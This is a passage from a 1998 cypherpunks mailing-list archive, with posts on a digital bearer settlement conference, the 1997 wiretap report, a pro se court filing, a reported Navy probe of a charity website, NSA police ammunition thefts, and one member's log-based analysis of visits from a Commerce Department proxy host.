have a hard time selling something like this to her market. However, if a
single person wanted write a book on digital bearer settlement, it seemed
like there might be more room to bash it into something her audience might
want to read. Since *I* didn't want to write a book, really, we sort of
left it at that.

About a week or two later, Pete Loshin, who now works as an editor for
Cutter Publications, invited me to come and stir things up at their
"Summit" conference, and sit on an internet commerce panel, which I've
already told you the story about.  While there, however, I talked to
several authors of books, and one of them, a pretty well-respected author
of hard-core IT computer books, told me that my whole geodesic society /
digital bearer settlement thing was something actually new to him, and that
he so rarely heard something new in his business. So, he encouraged me to
get started on a "trade" book, one for the general public, and spent about
an hour telling me how to get started.

So, when I got home, all excited, and I started bashing away on the popular
book I've been threatening to write for years on all this stuff.  Unlike a
technical and professional book, the typical first author doesn't get
advances for this kind of thing, so you have to write the whole thing in
advance and see what happens. So, we'll see what happens.

And then, something wierd happened. Kieth Dawson's TBTF newsletter did a
bit on me, Philodox, the dbs list and the conference, and, out of that, I
got email from *another* well-known editor asking me if I knew anyone who
wanted to do a book on micropayments or something. So, I got this guy on
the phone, cranked up the reality distortion field to 13  (monkeys flying),
and pitched him on a book on digital bearer settlement, using the content
request from the Bretton Woods conference call for presenters as a jumping
off point. He then asked me if I could do something a little more polemical
:-), and I sent that version off, but I think I scared him away. :-). I
haven't heard back from him, and I suppose he lost interest.

However, Tuesday, I met up with the original famous-book editor, the one I
was trying to pitch the conference book to, and told her what I had done
with the *other* editor on a digital bearer settlement book, and she wanted
to see it. She liked the first, unpolemic, version best, :-), and we're
still talking, which is a good sign.


So, all of this got me to thinking about how I want to proceed with my
proposed conference schedule.

I still want to do a conference this summer. Some kind of "gathering of the
clan" thing on the same order as the mac-crypto conferences Vinnie and I
do, but, of course, I have to make money on it.  Essentially, I'd put out
an open call for papers/presenters, bunch them together on the schedule
together roughly by content, and call it a program, just like I do for
mac-crypto. I wouldn't be reimbursing speakers or anything. People who
speak pay to see the rest of the conference, in essence, just like they do
at FCxx

After that, I'd start working on putting together a peer-reviewed
conference, hopefully in New York, but maybe Washington, where I'd had a
tentative offer. The problem with the Washington offer is that it's at a
university and I have to make money on this. I'm not a sinecured academic
;-), or even someone who has a day job. :-). That was the problem with
IFCA's takover of FCxx, the upside kind of went away for me. Oh, well, at
least I get credit for the idea. And three more trips to wherever the
conference goes as a member of IFCA's board.

Anyway, this doing conferences for profit is also why I can't use a
university location in the Boston area for this digital bearer settlement
developer's conference as well.

Finally, I'd still like to go to Bretton Woods again, but *next* summer,
and with a Workshop, with paid *paid* presenters, which is what this
summer's business development conference should have been all along. Maybe,
if I'm lucky, and the digital bearer settlement book's out, it'll be the
text book for this thing, or something.


So, let's look at this "gathering of the clan" idea first.  Because of all
the problems people had with the prices at Bretton Woods, I started
thinking of all kinds of ways to do it on the cheap.

Stuff like renting the Sons of Italy Hall here in Roslindale, my Boston
neighborhood. Which is not as dumb to do as it was, say, two years ago. The
crime rate in Boston, especially Roslindale/Hyde Park, which is now the
mayor's neighborhood, has fallen rediculously lately, and Roslindale's
undergoing a boomlet of sorts, with lots of new businesses, including a
couple of proto-bohemian cafes, a new grocery store, stuff like that. The
neighborhood is scruffy and full of new immigrants and said
freshly-installed bohemians, and a digital bearer settlement conference
here would feel about the same in terms of culture-clash as FC98 was on
Anguilla, which would be kind of cool. I think I could get a couple of
phone lines in to the hall, and, if I dropped a couple of routers and 56k
modems on them, I could get better bandwidth than we had in Anguilla, even.
;-). Of course, Roslindale in mid-July or early August is not quite
Anguilla in February, but, I still think it would have the same
foriegn-place *extremely* casual atmosphere. No beach, much less total
eclipse off the Montserrat Volcano, of course, but, well, you get the
point: "Hackers invade Roslindale. Film at 11."  The local business
development association would probably love me for it, probably as much as
the Anguillans love Vince for FCxx, which, of course, would have its
attractions for me as a local resident.

However, I still haven't talked to the manager of the hall, and I'm not
sure the place has air-conditioning (it has to, right?), much less
telephone lines, much less touchtone lines. Seriously. Not to mention that
I'd be hanging myself out to dry on deposits, and stuff, if nobody showed
up. Much less that I'd have to collect checks from people up front before I
could even make reservations for all this stuff. Having a credit card
merchant account would be nice, but it's still impossible at the moment.

Thinking about this very problem, I sent feelers out at this month's DCSB
meeting for the use of a company's net-wired auditorium-seating conference
room instead, to see if I could get it by way of sponsorship of the
conference. This would also reduce costs a bunch, but I haven't heard from
anyone on this, so it's probably a long shot at this point.


But, then, after DCSB that day, I was talking to the catering manager at
the Harvard Club, and, just as a kind of pro-forma thing, I asked him for a
small 2-day conference estimate for, say, 30-35 people. Because of all the
business I bring him with DCSB, he quoted me something which was
rediculously low in terms of my own financial exposure if things went
south. It's not like the Club is busy in the summer, when all the bankers
and lawyers go off to places like the Cape and the Vinyard anyway, so he
sees me as a safe way to get some new business in the door. And, since the
Club function rooms aren't booked up this time of the year, I could cancel
anytime up to a week in advance of the date if my attendance wasn't enough,
because I'd be bringing him "found money" anyway.

So, for about half the price of attending any business conference in a
downtown conference hotel, we could have something really nice in the
Harvard Club, 38 stories up, with harbor views, decent food, and
comfortable surroundings to schmooze in. There's the complication of the
jacket requirement, but, if we started on Thursday, Friday's a "business
casual" day, so we'd have only one day of dress code to contend with.  In
addition, I think dbs and dcsb folks, as more business and finance oriented
types, are more inclined deal to a single "dress-up" day than just plain
crypto folks, so I think this could wash.

The price for a Harvard Club version of, what?, "Digital Bearer Settlement
Developer's Conference", "Symposium?", whatever, including Net access like
we had at FC98, and A/V, and maybe video/audio taping or even netcasting,
if I can get the rights hocked off for a percentage or something, would be
on the order of $400 per person, including breakfast, lunch, and a cocktail
party the first night, and of course, paying me. :-). Getting lodging would
be up to you, but at least you're not locked into a $400/night room like we
were at Bretton Woods. I would bet most folks could find friends to crash
with, if it came to that.

I haven't priced the "Hackers Invade Roslindale" option, but I'd be happy
to do that instead if there's real interest in it. I'd just need to collect
money from people almost immediately to get started.

Frankly, I like either option.  They both sound cool.


I'm thinking about July 23-24 at the moment. In the same spirit of
"first-ever, last-minute" that we did mac-crypto in, of course.


So, folks, what do we want to do?

Contact me directly if you have questions on what particulars there are at
the moment, or, especially, if you want to speak at this thing. If there's
interest coalescing around one idea or another, I'll put out a "formal"
call for presenters pretty soon.

Also, if you want to chat publically about this conference or digital
bearer settlement in general, I figure the dbs@philodox.com list is the
best place to do this. It keeps the cross-posting and off-topic stuff on
other lists to a minimum. Here's the URL to subscribe:
<mailto:requests@philodox.com?subject=subscribe%20dbs>



Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 9 May 1998 11:31:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: 1997 Wiretap Report
Message-ID: <199805091831.OAA29612@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


The US Courts 1997 Wiretap Report is out:

   http://jya.com/wiretap97.htm

Total: 1,094, up 59 from 1996; 206 "electronic." 

374 taps in this nabe; dozens in this bldg, six in
this flat, a couple on this box, one under lip
counting morse teethgrinds.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Sat, 9 May 1998 11:42:01 -0700 (PDT)
To: remailer@replay.com
Subject: Re: FILED 98 MAY - 8 AM 11:31
In-Reply-To: <3553504B.6AA9@nmol.com>
Message-ID: <Pine.GSO.3.96.980508153800.27840G-100000@boxster>
MIME-Version: 1.0
Content-Type: text/plain


:: 
Anon-To: cypherpunks@cyberpass.net
      

This spam-proofed message was sent by Michael Froomkin.
To reply privately, send mail to my surname at law.tm

[cc's trimmed!]


Lest anyone be mislead, this filing is garbage.  I find particularly
ridiculous the idea that a court can only cite cases submitted by the
parties.  On the contrary, the court's duty is to cite the law correctly,
and thus to ignore anything inaccurate or irrelevant submitted by the
parties and to supplement where and when needed.  Nowhere is this duty
clearer when, as here, one side is not represented by counsel; as it
happens, the court exercises this duty to supplement _to help_ the pro se
plaintiff, not hurt it.

I have not followed the pleadings very carefully in this case, so I won't 
express a view on the merits except to say that having attempted to read
plaintiffs' submissions I was not able to figure out much about what merit
their case was supposed to have.  

Were I to be asked by a pro se plaintiff how to best present their case in
federal court, I would say:  don't try to write legalistically.  Use the
case caption at the top of the first page, as provided by the rules of
court, then identify who you are, and who you are suing in the first
paragraphs, then tell your story in plain and simple English with as few
legalisms as possible.  If you have a particular statute or statutes in
mind that you think were violated, do specify them, but also ask for
whatever other relief the court may find just or equitable so as to
preserve all your options. 

Legalistic mumbo-jumbo is NOT required, and only gets in the way of
telling your story.  Attacking the court is stupid, both because it
usually isn't justified and because it never achieves anything.


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     |
P.O. Box 248087            |
Coral Gables, FL 33124 USA | It's @#$#@ hot here.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Spam the President <president@whitehouse.gov>
Date: Sat, 9 May 1998 06:48:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: U.S. Navy caught hacking into British marine charity Web site
Message-ID: <355450B4.28BA4217@whitehouse.gov>
MIME-Version: 1.0
Content-Type: text/plain


http://www.infoworld.com/cgi-bin/displayStory.pl?98058.winavy.htm

  U.S. Navy caught hacking
  into British marine
  charity Web site 

  By Kristi Essick 
  InfoWorld Electric 

  Posted at 3:07 PM PT, May 8, 1998 
  The U.S. Navy has been caught attempting to
  break in to secure areas of a World Wide Web
  site sponsored by a U.K. marine-mammal
  preservation charity, according to officials at the
  organization. 

  The Whale and Dolphin Conservation Society
  (WDCS) -- which operates an online shopping
  site aimed at generating money for the welfare of
  the animals at http://www.wdcs-shop.com --
  said it was alerted to the attempted break-in last
  week by its site-hosting company, Merchant
  Technology Ltd. 

  "We were working late one night, and a
  command line request came in wanting to access
  unauthorized areas of the site," said Andy Fisher,
  marketing manager for Merchant. "We were
  amazed to find out it was the Pentagon." 

  Merchant built and manages the secure
  electronic-commerce site for the conservation
  society and routinely keeps an eye on who visits.
  If users attempt to gain access to unauthorized
  areas, the company is alerted to the source of the
  incoming request. 

  At 9:45 p.m. GMT on April 28, Fisher said,
  workers at Merchant were shocked to see an
  incoming attempt to breach security by a user
  identified as donhqns1.hq.navy.mil. 

  Merchant got in touch with WDCS immediately,
  only to find out that the charity had been
  contacted by the Navy a few weeks earlier. The
  Navy was interested in obtaining a report the
  group is working on that details the efforts of
  Russian animal experts to train dolphins in the
  Black Sea for military tasks, such as finding and
  attaching probes to submarines, Fisher said. 

  A WDCS representative said that there is
  nothing secret about the Russian government's
  activities in this area but that the document does
  contain information about the export of the
  trained dolphins to foreign countries. The group
  declined to give the Navy a copy of the report
  only because it was not complete at the time.
  Once it is made final, the report will be published
  and the Navy can then examine it, the
  representative said. 

  The WCDS said that it is confused about why the
  Navy would attempt to break in to its Web site. 

  "I think whoever it was within the U.S. Navy
  facility would have better things to do rather than
  try and hack into our computers," said Chris
  Stroud, the organization's director of campaigns,
  in a statement. "If they were seeking reports on
  the Black Sea, we shall be freely publishing these
  in the near future anyway." 

  The WCDS previously has commented
  unfavorably on Navy activities such as its
  low-frequency sonar trials off Hawaii and on
  ship collisions with endangered whales, the
  group said. 

  Merchant says it is "100 percent sure" the
  hacking attempt originated from the Navy.
  WDCS has notified the U.S. Embassy in London
  and the relevant U.K. authorities, the
  organization said. 

  "We hope that the U.S. authorities have some
  rational explanation for this incident," Stroud
  said. 

  "The Navy has not yet received a formal
  complaint on the issue," said a Navy official, who
  declined to be named. "Until the Navy receives a
  formal complaint with details, there's not much
  we can do to proceed further." 

  Merchant Technology Ltd., in Bath, England, can
  be reached at 44 (1225) 481 015. The Whale and
  Dolphin Conservation Society, also in Bath, can
  be reached at 44 (1225) 334 511 or
  http://www.wdcs.org. 

  Kristi Essick is a London correspondent for the
  IDG News Service, an InfoWorld affiliate.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Sat, 9 May 1998 13:15:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: corvette.bxa.doc.gov followup
Message-ID: <Pine.LNX.3.96.980509160534.13731A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This message describes a computer on the Internet, one
corvette.bxa.doc.gov (192.239.70.124) (hereafter corvette). This computer
is owned by the Bureau of Export Administration (hereafter BXA), which
itself is a branch of the Dept. of Commerce.

Here I am exploring the idea that corvette runs a bot that scans the
internet for materials regarding crypto export violation, and I
will raise a few questions in regards to this.

- From the BXA web page (www.bxa.doc.gov):

   The Bureau of Export Administration enhances the nation's security and
   its economic prosperity by controlling exports for national security,
   foreign policy, and short supply reasons. We administer the Export
   Administration Act by developing export control policies, issuing
   export licenses, and prosecuting violators. Additionally, BXA enforces
   the EAA's antiboycott provisions.    

A traceroute (timings excluded) from my computer system (a SLIP/PPP dialup
to MhvNet, located in Poughkeepsie NY) to corvette yields: 

 1  annex1 (199.0.0.10)
 2  router.mhv.net (199.0.0.1)
 3  sl-gw8-pen-3-4-T1.sprintlink.net (144.228.160.41)
 4  sl-bb1-pen-9-0-0.sprintlink.net (144.228.60.11)
 5  144.228.180.10 (144.228.180.10)
 6  nyc4-br2.bbnplanet.net (4.0.2.178)
 7  nyc4-nbr2.bbnplanet.net (4.0.5.29)
 8  vienna1-nbr2.bbnplanet.net (4.0.3.129)
 9  vienna1-nbr3.bbnplanet.net (4.0.5.46)
10  washdc1-br1.bbnplanet.net (4.0.1.89)
11  washdc1-cr1.bbnplanet.net (4.0.1.174)
12  docosesa.bbnplanet.net (192.221.253.3)
13  corvette.bxa.doc.gov (192.239.70.124)

It is especially useful to notice hops 10 and 11. The names of these two
hosts seem to indicate that the hops have tended towards Washington DC.
BBNPlanet is located in Washington, so it is probable that corvette
is too (though this is not necessarily true). 

On April 22nd 1998, an anonymous connection was made from corvette to my
personal computer, ismene. This connection is only possible through my
main web page which is located on spice.mhv.net, which then links to
my computer. This mechanism is needed because ismene gets a dynamic IP.

Spice's logs show: 

corvette.bxa.doc.gov - - [22/Apr/1998:14:05:49 -0400] "GET /~mgraffam 
	HTTP/1.0" 302 -
corvette.bxa.doc.gov - - [22/Apr/1998:14:05:50 -0400] "GET /~mgraffam/
	HTTP/1.0" 200 2019
corvette.bxa.doc.gov - - [22/Apr/1998:14:06:16 -0400] "GET
	/~mgraffam/misc/access.html HTTP/1.0" 200 629

The connector from corvette directly targeted my homepage, and then
immediately went to the page that accesses ismene. The connector bypassed
a page about crypto titled "Cryptotechnic Enlightenment". It is, perhaps,
this odd combination of words that escaped a bot's notice, but would have
surely been noticed by human. Instead the alleged bot picked up on
"access.html" and left links to my RSA and PGP public keys untouched. If
corvette is running a bot, it seems probable that they would ignore PGP
keys because they surely generate a large amount of noise when
exploring things of a cryptographic nature. This may account for the
behavior. 

The access.html on spice has links to my computer. HTTP, FTP and telnet
links are established, and direct links are made to copies of my public
keys. The first three links to my keys via FTP are bypassed, and a 
connection is made via HTTP to my computer (ismene). The portions from
ismene's httpd log follow:

corvette.bxa.doc.gov - - [22/Apr/1998:13:58:51 -0400] "GET / HTTP/1.0" 200 1858
corvette.bxa.doc.gov - - [22/Apr/1998:13:59:48 -0400] "GET /crypto_index.zip
	HTTP/1.0" 200 19570

Corvette picks up the crypto_index.zip file, and leaves links titled
"Index of unfinished works" and "Misc. projects". That corvette picked
up the crypto_index.zip file establishes that it is looking for crypto
related material. Why did it pass up the "Cryptotechnic Enlightenment"
page then? I submit that it is because the word "cryptotechnic" did not
trip the bot's sensor but the word "crypto" in the link title to
crypto_index.zip did. I also believe that a human would have followed the
"unfinished works" or "misc projects" links after getting a crypto
index file. A human would be intelligent enough to intuit the connection;
a spider is not.

At this point, I imagine the bot reaching the end of ismene's main page,
having picked up the file it thought was useful and returning back to
the access.html file on spice and traversing to the next link.

In this case, it is an ftp connection to my machine. A portion of my logs:

Apr 22 14:00:13 localhost opieftpd[1509]: connect from 
	firewall-user@192.239.70.124
Apr 22 14:00:14 localhost ftpd[1509]: connection from corvette.bxa.doc.gov
	at We d Apr 22 14:00:14 1998 
Apr 22 14:00:15 localhost ftpd[1509]: Anonymous FTP connection made from
	host corvette.bxa.doc.gov.
Apr 22 14:00:16 localhost ftpd[1509]: ANONYMOUS FTP login from
	corvette.bxa.doc.gov with ID mozilla@

After logging in corvette issues the following commands:

Apr 22 14:00:22 localhost ftpd[1509]: <--- 200 Type set to I.
Apr 22 14:00:23 localhost ftpd[1509]: command: SIZE /^M 
Apr 22 14:00:23 localhost ftpd[1509]: <--- 550 /: not a plain file.
Apr 22 14:00:25 localhost ftpd[1509]: command: CWD /^M 
Apr 22 14:00:25 localhost ftpd[1509]: <--- 250 CWD command successful.
Apr 22 14:00:28 localhost ftpd[1509]: command: LIST^M 
Apr 22 14:00:29 localhost ftpd[1509]: <--- 150 Opening BINARY mode data
	connection for /bin/ls.
Apr 22 14:00:29 localhost ftpd[1509]: <--- 226 Transfer complete.
Apr 22 14:00:35 localhost ftpd[1509]: command: PORT 192,239,70,124,7,228^M 
Apr 22 14:00:35 localhost ftpd[1509]: <--- 200 PORT command successful.
Apr 22 14:00:36 localhost ftpd[1509]: command: SIZE /pub/^M 
Apr 22 14:00:36 localhost ftpd[1509]: <--- 550 /pub/: not a plain file.
Apr 22 14:00:39 localhost ftpd[1509]: command: CWD /pub/^M 
Apr 22 14:00:39 localhost ftpd[1509]: <--- 250 CWD command successful.
Apr 22 14:00:40 localhost ftpd[1509]: command: LIST^M 
Apr 22 14:00:40 localhost ftpd[1509]: <--- 150 Opening BINARY mode data
	connection for /bin/ls.
Apr 22 14:00:40 localhost ftpd[1509]: <--- 226 Transfer complete.
Apr 22 14:00:47 localhost ftpd[1509]: command: PORT 192,239,70,124,7,235^M 
Apr 22 14:00:47 localhost ftpd[1509]: <--- 200 PORT command successful.
Apr 22 14:00:48 localhost ftpd[1509]: command: SIZE /pub/skey/^M 
Apr 22 14:00:48 localhost ftpd[1509]: <--- 550 /pub/skey/: not a plain file.
Apr 22 14:00:50 localhost ftpd[1509]: command: CWD /pub/skey/^M 
Apr 22 14:00:50 localhost ftpd[1509]: <--- 250 CWD command successful.
Apr 22 14:00:51 localhost ftpd[1509]: command: LIST^M 
Apr 22 14:00:51 localhost ftpd[1509]: <--- 150 Opening BINARY mode data
	connection for /bin/ls.
Apr 22 14:00:51 localhost ftpd[1509]: <--- 226 Transfer complete.
Apr 22 14:01:08 localhost ftpd[1509]: command: PORT 192,239,70,124,8,1^M 
Apr 22 14:01:08 localhost ftpd[1509]: <--- 200 PORT command successful.
Apr 22 14:01:08 localhost ftpd[1509]: command: SIZE /pub/skey/README^M 
Apr 22 14:01:08 localhost ftpd[1509]: <--- 213 1149
Apr 22 14:01:09 localhost ftpd[1509]: command: RETR /pub/skey/README^M 

This series of commands ignores a directory called "keys" at root level,
which is consistent with ignoring PGP keys above, and cd's to pub/skey.
It then retrieves the README file (which is just a copy of NRL's readme)
and leaves. The connection style itself (of SIZE'ing directory names)
is odd, but this can be recreated with older versions of Netscape
Navigator. 

I will assume that these connections are really from Netscape, and _not_
from a bot disguising itself as NS Navigator. 

Greg Broiles (gbroiles@netbox.com) forwarded portions of his logs on
parrhesia to me:

corvette.bxa.doc.gov - - [20/Mar/1998:10:18:07 -0800] "GET /wassenaar/
HTTP/1.0" 200 2253
"http://search.excite.com/search.gw?collection=web&display=html2,lb&search=w
assenaar+countries" "Mozilla/2.0 (compatible; MSIE 3.02; Windows 3.1)"

corvette.bxa.doc.gov - - [20/Mar/1998:10:18:46 -0800] "GET /wassenaar/
HTTP/1.0" 200 2253 "-" "Mozilla/2.0 (compatible; MSIE 3.02; Windows 3.1)"

These shows connections from MSIE, can anyone confirm that MSIE makes
FTP requests in the same manner as NS? 

Here I raise two questions that I would like to discuss, in private email
if needed because it is off-topic. First, could Navigator be made to
crawl the web? Could it be programmed via OLE, or Java? If it could, then
it could easily be used as the protocol frontend to a spider that could
easily crawl http, ftp, gopher, and news references looking for crypto
export violations.

If programming Navigator would entail pushing keystrokes into the keyboard
buffer and simulating mouse events, I do not believe it would be used as
tying up a machine's console in this manner would be vastly inefficient
and it would be better justified to pay a programmer to develop the
software to do it without NS.

Now I would like to focus on a different aspect of my logs: the
identification of a firewall-users@192.239.70.124. It seems as if
corvette is a proxy server for other machines.

A port probe of corvette yields the following services:

corvette.bxa.doc.gov           ftp                 21/tcp 
corvette.bxa.doc.gov           smtp                25/tcp mail
corvette.bxa.doc.gov           whois               43/tcp nicname
corvette.bxa.doc.gov           gopher              70/tcp
corvette.bxa.doc.gov           finger              79/tcp 
corvette.bxa.doc.gov           www                 80/tcp http

ismene:~$ finger @corvette.bxa.doc.gov
[corvette.bxa.doc.gov]
        Finger from your system is not permitted through the firewall.

ismene:~$ ftp corvette.bxa.doc.gov
Connected to corvette.bxa.doc.gov.
220-Proxy first requires authentication
220 corvette.bxa.doc.gov FTP proxy (Version 3.2) ready.

- From these two connections, we can see that corvette is indeed a
firewalling proxy. Because of this, we cannot be sure if all connections
out of corvette belong to the possible spider.

An altavista search for corvette.bxa.doc.gov turns up the web statistics
logs of several servers, including military and foreign servers. 
Such a bot may crawl foreign servers looking for links or files from the
U.S., and it may crawl military sites to see to it that regulated
materials are not being exported (like the pgp fiasco). On the other hand,
this is mere speculation, it is equally likely that humans at BXA are
putzing around the net, looking at different sites.

This latter fact can be established (or we must admit to an incredibly
wide reaching bot that is not limited to crypto) because spice.mhv.net
has logged connections from corvette to www.mhv.net/~donn/diet.html
which is the main page for a health/fitness related hierarchy. It is
apparently a popular site for that material and is linked to frequently
by other sites. It is possible that a bot crawled around this way, but
unlikely since from the evidence on my machine the bot (if it is one)
is fairly discriminating about the links it follows.

Humans use the corvette proxy.

It is hard to tell which links drew corvette's attention from those sites
that were hit up. Here is an attempt at a classification of sites that
get connections from corvette:

* Physics:
  nsi.net.kiae.su, a nuclear safety institute, keeps a log specifically of
  U.S. government computers that have connected to them. Corvette made 65
  requests to nsi.net.kiae.su. 

  University of Crete Physics Dept. (www.edu.physics.uch.gr) 21 times.

* Other Science and Technology:
  The Bioscan project at genome.cs.unc.edu was hit twice.
  
  The BCD (Biological Computing Division) of the Weizmann Institute in
  Israel was hit 9 times.

  CSIRO Minerals, www.csiro.au, was hit 1.

  The Texas Agricultural Extension Service was hit twice.

* Political:
  www.tbs-sct.gc.ca the Canadian Treasury Board was hit once. 

* Military:
  The U.S. Army's Signal Corps was hit 13 times.


Several universities were hit as well, presumably because of a student
pages. Other miscellaneous sites that were hit include a martial arts
page, a personal interests page and a porn page. 

The urls for the pages in question are included below.

If this sample of sites is representative of the connections made by 
corvette, then physics sites make up the bulk of those connections.

No verifiable connections were made to crypto related sites other than my
own. I do not know why the connections were made to the universities,
I figure that it is because of student interests.

Given the nature of BXA's mission, and the sort of material that I make
available on my homepage on spice I still find it strange that the 
"Cryptotechnic Enlightenment" page was passed by. This is underscored
by the fact that the "Misc." and "Unfinished" links were passed up,
even when corvette is obviously looking for crypto stuff (by getting
crypto_index.zip).

However, there is a general lack of relevent connections made to crypto
related sites by corvette on the internet as a whole. If corvette is
proxying a bot, I think that the bot may be targeted at individuals 
and is not a wide-spread intelligence gathering device. 

I would be interested in hearing if corvette has made connections to
crypto oriented sites. If those that run sites with crypto material could
post any connections they have had from corvette, I would appreciate it. 

Michael Graffam (mgraffam@mhv.net)

- -----------------------------------------------------------------------

URLS relating to corvette.bxa.doc.gov turned up by Altavista:

http://chip.mcl.ucsb.edu/lopaka/usage/weeks/hosts/www.mcl.ucsb.edu.13.total-hosts.html
http://www.tbs-sct.gc.ca/tbsstats/tbstats/N1997-06.TXT
http://nsi.net.kiae.su/w3perl/Pays/US-Government.html
http://www.tbs-sct.gc.ca/tbsstats/tbstats/N1997-03.TXT
http://genome.cs.unc.edu/wusage/week59.html
http://dapsas.weizmann.ac.il/reports/31Oct1997.hosts.html
http://www.minerals.csiro.au/wusage/new/log.ext/log1997/sites0896.html
http://www.gordon.army.mil/usage/H1997-01.TXT
http://www.amherst.edu/~erreich/visitors.html
http://www.ufl.edu/9607-14.html
http://data.gc.peachnet.edu/APPS/WWW/USAGE/1996/H1996-07.TXT
http://data.gc.peachnet.edu/APPS/WWW/USAGE/1996/H1996-09.TXT
http://www.edu.physics.uch.gr/usage/week89.html
http://www.edu.physics.uch.gr/usage/week56.html
http://www.gordon.army.mil/usage/H1996-09.TXT (2)
http://leviathan.tamu.edu:70/0/gnlog/1996/9612/9612.hosts
http://lfowler.afternet.com/logfiles/sites0298.html
http://www.chelt.ac.uk/usage/ws970622.htm
http://www.splosh.co.uk/usage/weeks/hosts/splosh.9.total-hosts.html
http://www.ufl.edu/9803-08.html
http://www.italcultusa.org/home/_private/mailing.txt
http://lfowler.afternet.com/logfiles/sites0198.html

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
I think that we should be men first, and subjects afterward. It is not
desirable to cultivate a respect for the law, so much as for the right.
			Henry David Thoreau "Civil Disobedience"

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBNVS3VQKEiLNUxnAfAQFz2QP+Ow8vwjFYOM/tN4kcyOpxbxWbr4S6bkWv
5zBctIwWk9qWedLxHXMH67JV3AATou1aFUTXL2w4J56frkhgcPIcgjV1j7ME6y/r
qNBvysaXzTkIUu/Vj9TJeigbKWTa7YiVgLn97X/RnjfjapD62e3ejhCOurEeDSPr
6u2BFhOGAIk=
=fTJr
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 9 May 1998 18:09:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: nsa police & ammunition theft
Message-ID: <199805100109.SAA20181@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message

From: believer@telepath.com
Subject: IP: NSA police suspected in agency thefts

Forwarded:
- -----------------

>Source: The Baltimore Sun, May 9, 1998
>http://www.sunspot.net
>
>NSA police suspected in agency thefts
>
>50,000 rounds of ammunition reported stolen; 'An active investigation'; 2
>officers allowed to resign; at least 9 others targeted
>
>By Tom Bowman
>Sun National Staff
>
>WASHINGTON -- Nearly a dozen members of the police force that guards the
>top-secret National Security Agency are suspected of stealing ammunition
>from the Fort Meade-based agency, sources and federal officials said
>yesterday.
>
>The thefts, which included up to 50,000 rounds of ammunition, represent an
>embarrassing incident for the NSA, an intelligence agency that eavesdrops
>on foreign communications and makes and breaks codes. Besides NSA
>officials, agents of the Bureau of Alcohol, Tobacco and Firearms are
>investigating the thefts.
>
>While no arrests have been made, several police officers have been
>implicated, officials said. But details about the thefts and the progress
>of the investigation remained sketchy yesterday.
>
>Larry Stewart, special agent in charge of the bureau's Baltimore office,
>declined to comment on the amount of ammunition stolen or the number of
>officers from the NSA's Security Protective Officer force who are under
>investigation.
>
>"That I can't share with you," Stewart said. "The only thing I can tell you
>is it's an active investigation, and we can't comment on that."
>
>NSA officials also declined to discuss the investigation. The agency
>released a brief statement yesterday saying it was "nearing completion on
>an investigation involving Security Protective Officers."
>
>Agency sources said two sergeants on the force have been allowed to resign
>as a result of the investigation, including one who oversaw the force's
>ammunition and weapons. At least nine other officers are under
>investigation.
>
>The sergeant who was in charge of ammunition, William R. Fabus, said he had
>resigned voluntarily on May 1 after he was questioned by agents.
>
>"I was not aware that anything was missing," said Fabus, 36, of
>Catonsville, adding that he expects no further inquiries or criminal
>charges. "I was told there was nothing criminal that I did."Fabus, a
>10-year veteran of the force, declined to say why he had abruptly resigned.
>"I don't know where I'm stepping," he said. "If I give out any information
>considered national security stuff, it would be adverse toward me."
>
>Officer named others
>
>Officials would not say when they believe the thefts began or how they were
>detected, though one former agency employee said the thefts had been
>occurring for at least two months. The source said one officer was caught
>and began implicating others.
>
>The thefts have resulted in new security procedures at the agency, sources
>said, and employees have been warned not to talk about the investigation.
>The NSA, which employs about 23,000 people at Fort Meade, is the largest
>employer in Maryland.
>
>As part of the inquiry, investigators found grenades and assault rifles,
>although neither were NSA property, sources said.
>
>"It shocked a lot of people," the former employee, who requested anonymity,
>said of the thefts. "[The officers] are not kids; they've been working
>there a long time."
>
>The uniformed police force includes several hundred officers and provides
>security at NSA's sprawling complex off the Baltimore-Washington Parkway
>and its satellite locations throughout Maryland.
>
>Top-security clearance
>
>The officers, whose average salary is about $30,000, undergo two months of
>training at a facility in Georgia with other federal police officers, and
>carry either 9 mm or 38-caliber handguns, former members of the force said.
>
>They also possess the government's top-security clearance, known as SCI for
>Sensitive Compartmented Information, the eavesdropping product that is
>among the nation's most guarded secrets.
>
>Officials would not say whether they suspect that the officers were using
>the ammunition for their own use or were selling it. FBI spokesmen and
>staffers on the congressional intelligence oversight committees said they
>were unaware of the investigation.
>
>"This is the first I've heard of it," Larry Foust, an FBI spokesman in
>Baltimore, said when called by a reporter. One top FBI official in
>Washington privately expressed surprise that the bureau had not been
>notified, considering the possible extent of the theft.
>
>Morale problems
>
>Besides the thefts, agency officials have pointed to administrative and
>morale troubles among the force. In a recent report, portions of which were
>obtained by The Sun, the agency noted tensions among the uniformed police
>supervisors, many of whom are high school graduates, and a rising number of
>college-educated officers who are being hired.
>
>"The supervisors may feel threatened by subordinates who may be brighter
>and more willing to empower themselves to make independent decisions," the
>report said.
>
>Moreover, the report said, newly hired officers have not been given a
